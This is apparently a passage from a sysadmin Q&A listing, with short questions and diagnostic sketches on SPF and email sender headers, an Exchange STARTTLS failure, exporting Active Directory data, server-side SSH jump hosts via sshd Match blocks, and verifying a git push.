    Is there a better way to achieve the desired experience? We'd like to be a "good citizen" of the net, and all parties involved - senders and recipients - want to participate and receive these messages. One alternative is to always use our company email address in the FROM header and prepend the author's name/address to the subject, but this seems a little clumsy.
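
    The "571 incorrect IP" wording from psmtp suggests the receiving service checks whether the connecting IP is authorized for the domain it sees, which is what SPF records publish - and SPF is evaluated against the envelope sender, not the Sender header. A minimal sketch of inspecting a recipient domain's policy before deciding which FROM strategy to use:

        # SPF is published as a TXT record on the domain
        dig +short TXT example.com | grep -i spf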


  • Exchange - inbound email only works from some servers

    - by Kryptonite
    I am having a problem where inbound mail from outside only works when sent from certain hosts. For example, when I send myself an email from my personal Gmail account, all is well, as the logs show:

        2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 EHLO 250 - -
        2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 STARTTLS 220 - -
        2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 STARTTLS 220 - -
        2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 EHLO 250 - -
        2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 MAIL 250 - -
        2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 RCPT 250 - -
        2012-09-05 18:14:48 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 QUIT 240 - -

    However, if I send from my personal Yahoo account, I get this response:

        Sorry, we were unable to deliver your message to the following address.
        <[email protected]>:
        Remote host said: 530 5.7.0 Must issue a STARTTLS command first [MAIL_FROM]

    (NB: Nothing appeared in the SMTP log for this message.) Any suggestions where to start looking?

    EDIT: I don't know if it matters, but the certificate I am using for TLS is self-signed.
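
    The Yahoo bounce says the server demanded STARTTLS but the sender never issued it, so the question becomes what each sending host sees when it tries to negotiate TLS - and a self-signed certificate can matter, since some senders refuse to proceed when verification fails. A minimal sketch of checking from outside (the hostname is a placeholder):

        # connect, upgrade via STARTTLS, and print the certificate the server presents
        openssl s_client -starttls smtp -connect mail.example.com:25
        # in the pre-TLS banner exchange, look for 250-STARTTLS being advertised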


  • Extracting information from Active Directory

    - by Nop at NaDa
    I work in the IT support department of a branch of a huge company. I have to take care of a database with all the users, computers, etc. I'm trying to find a way to update the database automatically as much as possible, but the IT infrastructure guys don't give me enough privileges to use Active Directory to dump the users, nor do they have the time to give me the information I need.

    Some days ago I found Active Directory Explorer from Sysinternals, which lets me browse through Active Directory, and I found all the information I need there (username, real name, date created, privileges, company, etc.). Unfortunately, I'm unable to export the data to a human-readable format; I'm only able to take a snapshot of the whole database in a machine-readable format. Taking the snapshot takes hours, and I'm afraid the infrastructure guys won't like me doing entire snapshots on a regular basis.

    Do you know of any tool (command-line is preferable) that would let me retrieve the values of the keys or export them to XML, CSV, etc.?


  • Server-side SSH jump hosts

    - by Dan Sosedoff
    Trying to figure out server-side SSH jump-host logic. Current network schema:

        [Client] <--> [Server A: hostname: a.com] <--> [Server B]
        [Client] <--> [Server A: hostname: b.com] <--> [Server C]

    Server A responds to both DNS records. The desired flow: the client opens an SSH connection with ssh [email protected]; Server A accepts it and should automatically jump the user onto Server B with ssh user2@server_b.com. The client opens an SSH connection with ssh [email protected]; Server A accepts it and should automatically jump the user onto Server C with ssh user2@server_c.com.

    In other words, the client should be able to connect to the target without performing any local configuration, assuming a stock ssh config. The problem with SSH jumps is that the user has to define hosts in the local ~/.ssh/config file, which is not acceptable in my case; it needs to be default sshd behavior. I'm aware that you can define a custom command in ~/.ssh/authorized_keys on the server, but I don't think there is a way to properly detect the source hostname the user tried to connect to. Is it possible at all?
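
    The SSH protocol doesn't transmit the hostname the client typed, so the server can't branch on a.com vs b.com directly - but if the two names resolve to different IP addresses on Server A, sshd can branch on which local address accepted the connection. A minimal sketch, with placeholder addresses, assuming Server A's users hold keys or credentials for Servers B and C:

        # append per-address forced commands to sshd_config, then reload sshd
        sudo tee -a /etc/ssh/sshd_config <<'EOF'
        Match LocalAddress 192.0.2.1
            ForceCommand ssh -t user2@server_b.com
        Match LocalAddress 192.0.2.2
            ForceCommand ssh -t user2@server_c.com
        EOF
        sudo service ssh reload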


  • GitHub - commit local changes in local branch to remote branch

    - by user62046
    I use Git Shell on Windows 7, working in a branch named Save-Rotation. Then I used git push origin Save-Rotation to push the changes to the remote. The result is posted at the end; it seems good. But when I went to my repository on the GitHub site, https://github.com/chiapas/sumatrapdf/tree/Save-Rotation, I couldn't see any change in the repository tree or commit tree. How can I know whether the push to the remote was successful, and why is the repository page not updated? Here is the result on the command line:

        C:\Users\imo\Documents\GitHub\sumatrapdf [Save-Rotation]> git push origin Save-Rotation
        Counting objects: 167, done.
        Delta compression using up to 8 threads.
        Compressing objects: 100% (18/18), done.
        Writing objects: 100% (119/119), 27.43 KiB, done.
        Total 119 (delta 101), reused 119 (delta 101)
        To https://github.com/chiapas/sumatrapdf
         * [new branch]      Save-Rotation -> Save-Rotation

        C:\Users\imo\Documents\GitHub\sumatrapdf [Save-Rotation +2 ~17 -0 !]> git push origin Save-Rotation
        Everything up-to-date

        C:\Users\imo\Documents\GitHub\sumatrapdf [Save-Rotation +2 ~17 -0 !]>
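
    The "* [new branch] Save-Rotation -> Save-Rotation" line means the push succeeded, and "Everything up-to-date" on the second attempt confirms the remote already matches. A minimal sketch of verifying from the command line rather than the web UI:

        # ask the remote which commit its Save-Rotation branch points at
        git ls-remote origin Save-Rotation
        # compare with the local branch tip - matching hashes mean the push landed
        git rev-parse Save-Rotation

    On the website, a non-default branch shows up in the branch selector; the repository front page keeps showing the default branch's tree and commits until that is switched.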

